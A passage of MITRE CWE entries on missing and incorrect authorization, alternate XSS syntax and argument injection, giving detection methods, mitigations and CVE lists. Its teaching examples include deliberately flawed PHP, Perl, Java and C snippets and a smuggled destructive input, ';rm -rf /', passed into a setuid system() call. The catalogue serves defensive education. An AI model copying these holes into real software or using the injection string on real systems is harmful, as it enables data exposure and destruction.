environment. - - - - Implementation - A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies. - - - Operation - - - High - - - Confidentiality - Read Application Data - Read Files or Directories - An attacker could read sensitive data, either by reading the data directly from a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to read the data. - - - Integrity - Modify Application Data - Modify Files or Directories - An attacker could modify sensitive data, either by writing the data directly to a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to write the data. - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality. - - - - - Automated Static Analysis - - Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries. - Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives. - - Limited - - - Automated Dynamic Analysis - Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic. - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms. - - Moderate - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints. - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host Application Interface Scanner - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - - - High - - - - - Architecture and Design - - Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. - Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role. - - - - Architecture and Design - Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7]. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]. - - - - Architecture and Design - - For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page. - One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page. - - - - System Configuration - Installation - Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs. - - - - - This function runs an arbitrary SQL query on a given database, returning the result of the query. - - function runEmployeeQuery($dbName, $name){mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); - //Use a prepared statement to avoid CWE-89 - $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');$preparedStatement->execute(array(':name' => $name));return $preparedStatement->fetchAll();} - /.../ - - $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); - - While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. - - - The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory. - - sub DisplayPrivateMessage {my($id) = @_;my $Message = LookupMessageObject($id);print "From: " . encodeHTML($Message->{from}) . "<br>\n";print "Subject: " . encodeHTML($Message->{subject}) . "\n";print "<hr>\n";print "Body: " . encodeHTML($Message->{body}) . "\n";} - my $q = new CGI; - # For purposes of this example, assume that CWE-309 and - - - - # CWE-523 do not apply. - if (! AuthenticateUser($q->param('username'), $q->param('password'))) {ExitError("invalid username or password");} - my $id = $q->param('id');DisplayPrivateMessage($id); - - While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users. - One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user. - - - - - CVE-2009-3168 - Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168 - - - CVE-2009-3597 - Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597 - - - CVE-2009-2282 - Terminal server does not check authorization for guest access. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282 - - - CVE-2008-5027 - System monitoring software allows users to bypass authorization by creating custom forms. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027 - - - CVE-2009-3781 - Content management system does not check access permissions for private files, allowing others to view those files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781 - - - CVE-2008-6548 - Product does not check the ACL of a page accessed using an "include" directive, allowing attackers to read unauthorized files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548 - - - CVE-2009-2960 - Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960 - - - CVE-2009-3230 - Database server does not use appropriate privileges for certain sensitive operations. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230 - - - CVE-2009-2213 - Gateway uses default "Allow" configuration for its authorization settings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213 - - - CVE-2009-0034 - Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034 - - - CVE-2008-6123 - Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123 - - - CVE-2008-7109 - Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109 - - - CVE-2008-3424 - Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424 - - - CVE-2005-1036 - Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036 - - - CVE-2008-4577 - ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577 - - - CVE-2007-2925 - Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925 - - - CVE-2006-6679 - Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679 - - - CVE-2005-3623 - OS kernel does not check for a certain privilege before setting ACLs for files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623 - - - CVE-2005-2801 - Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801 - - - CVE-2001-1155 - Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155 - - - CVE-2020-17533 - Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533 - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms, Observed_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - - - The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. - - Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. - When access control checks are incorrectly applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. - - - - - - - - - - - - An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object. - - - - AuthZ - "AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is distinct from "AuthN" (or, sometimes, "AuthC") which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. - - - - - Architecture and Design - Authorization weaknesses may arise when a single-user application is ported to a multi-user environment. - - - Implementation - - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies. - - - - Operation - - - High - - - Confidentiality - Read Application Data - Read Files or Directories - An attacker could read sensitive data, either by reading the data directly from a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to read the data. - - - Integrity - Modify Application Data - Modify Files or Directories - An attacker could modify sensitive data, either by writing the data directly to a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to write the data. - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality. - - - - - Automated Static Analysis - - Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries. - Generally, automated static analysis tools have difficulty detecting custom authorization schemes. Even if they can be customized to recognize these schemes, they might not be able to tell whether the scheme correctly performs the authorization in a way that cannot be bypassed or subverted by an attacker. - - Limited - - - Automated Dynamic Analysis - Automated dynamic analysis may not be able to find interfaces that are protected by authorization checks, even if those checks contain weaknesses. - - - Manual Analysis - - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms. - - Moderate - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints. - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host Application Interface Scanner - Fuzz Tester - Framework-based Fuzzer - Forced Path Execution - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - - Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. - Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role. - - - - Architecture and Design - Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7]. - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]. - - - - Architecture and Design - - For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page. - One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page. - - - - System Configuration - Installation - Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs. - - - - - The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user's authorization using a value stored in a cookie. - - $role = $_COOKIES['role'];if (!$role) {$role = getRole('user');if ($role) {// save the cookie to send out in future responsessetcookie("role", $role, time()+60*60*2);}else{ShowLoginScreen();die("\n");}}if ($role == 'Reader') {DisplayMedicalHistory($_POST['patient_ID']);}else{die("You are not Authorized to view this record\n");} - - The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the "role" cookie to the value "Reader". As a result, the $role variable is "Reader", and getRole() is never invoked. The attacker has bypassed the authorization system. - - - - - CVE-2019-15900 - Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900 - - - CVE-2009-2213 - Gateway uses default "Allow" configuration for its authorization settings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213 - - - CVE-2009-0034 - Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034 - - - CVE-2008-6123 - Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123 - - - CVE-2008-7109 - Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109 - - - CVE-2008-3424 - Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424 - - - CVE-2008-4577 - ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577 - - - CVE-2006-6679 - Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679 - - - CVE-2005-2801 - Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801 - - - CVE-2001-1155 - Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155 - - - - - - - - - - - - - CWE Content Team - MITRE - 2011-05-24 - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Description - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Alternate_Terms - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - - - The software does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Resolve all input to absolute or canonical representations before processing. - - - Implementation - Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent: - - public String preventXSS(String input, String mask) {return input.replaceAll("script", mask);} - - The code only works when the "script" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as "SCRIPT" or "ScRiPt" will not be neutralized by this method, allowing an XSS attack. - - - - - CVE-2002-0738 - XSS using "&={script}". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0738 - - - - - Alternate XSS syntax - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Name, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description, Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Alternate XSS Syntax - Failure to Sanitize Alternate XSS Syntax - - - - The software constructs a string for a command to executed by a separate component -in another control sphere, but it does not properly delimit the -intended arguments, options, or switches within that command string. - - When creating commands using interpolation into a string, developers may assume that only the arguments/options that they specify will be processed. This assumption may be even stronger when the programmer has encoded the command in a way that prevents separate commands from being provided maliciously, e.g. in the case of shell metacharacters. When constructing the command, the developer may use whitespace or other delimiters that are required to separate arguments when the command. However, if an attacker can provide an untrusted input that contains argument-separating delimiters, then the resulting command will have more arguments than intended by the developer. The attacker may then be able to change the behavior of the command. Depending on the functionality supported by the extraneous arguments, this may have security-relevant consequences. - - - - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Other - Execute Unauthorized Code or Commands - Alter Execution Logic - Read Application Data - Modify Application Data - An attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified or could cause other unintended behavior. - - - - - Implementation - Parameterization - Where possible, avoid building a single string that contains the command and its arguments. Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command. For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments. In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter. - High - - - Architecture and Design - Input Validation - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained. - - - Implementation - - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control. - Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content. - - - - Implementation - When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so. - - - Implementation - When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined. - - - Testing - Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Testing - Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - - - - - The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system. - - int main(int argc, char** argv) {char cmd[CMD_MAX] = "/usr/bin/cat ";strcat(cmd, argv[1]);system(cmd);} - - Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition. - Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120). - - - - - CVE-1999-0113 - Canonical Example - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113 - - - CVE-2001-0150 - Web browser executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0150 - - - CVE-2001-0667 - Web browser allows remote attackers to execute commands by spawning Telnet with a log file option on the command line and writing arbitrary code into an executable file which is later executed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0667 - - - CVE-2002-0985 - Argument injection vulnerability in the mail function for PHP may allow attackers to bypass safe mode restrictions and modify command line arguments to the MTA (e.g. sendmail) possibly executing commands. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0985 - - - CVE-2003-0907 - Help and Support center in windows does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an "hcp://" URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0907 - - - CVE-2004-0121 - Mail client does not sufficiently filter parameters of mailto: URLs when using them as arguments to mail executable, which allows remote attackers to execute arbitrary programs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0121 - - - CVE-2004-0473 - Web browser doesn't filter "-" when invoking various commands, allowing command-line switches to be specified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0473 - - - CVE-2004-0480 - Mail client allows remote attackers to execute arbitrary code via a URI that uses a UNC network share pathname to provide an alternate configuration file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0480 - - - CVE-2004-0489 - SSH URI handler for web browser allows remote attackers to execute arbitrary code or conduct port forwarding via the a command line option. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0489 - - - CVE-2004-0411 - Web browser doesn't filter "-" when invoking various commands, allowing command-line switches to be specified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0411 - - - CVE-2005-4699 - Argument injection vulnerability in TellMe 1.2 and earlier allows remote attackers to modify command line arguments for the Whois program and obtain sensitive information via "--" style options in the q_Host parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4699 - - - CVE-2006-1865 - Beagle before 0.2.5 can produce certain insecure command lines to launch external helper applications while indexing, which allows attackers to execute arbitrary commands. NOTE: it is not immediately clear whether this issue involves argument injection, shell metacharacters, or other issues. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1865 - - - CVE-2006-2056 - Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2056 - - - CVE-2006-2057 - 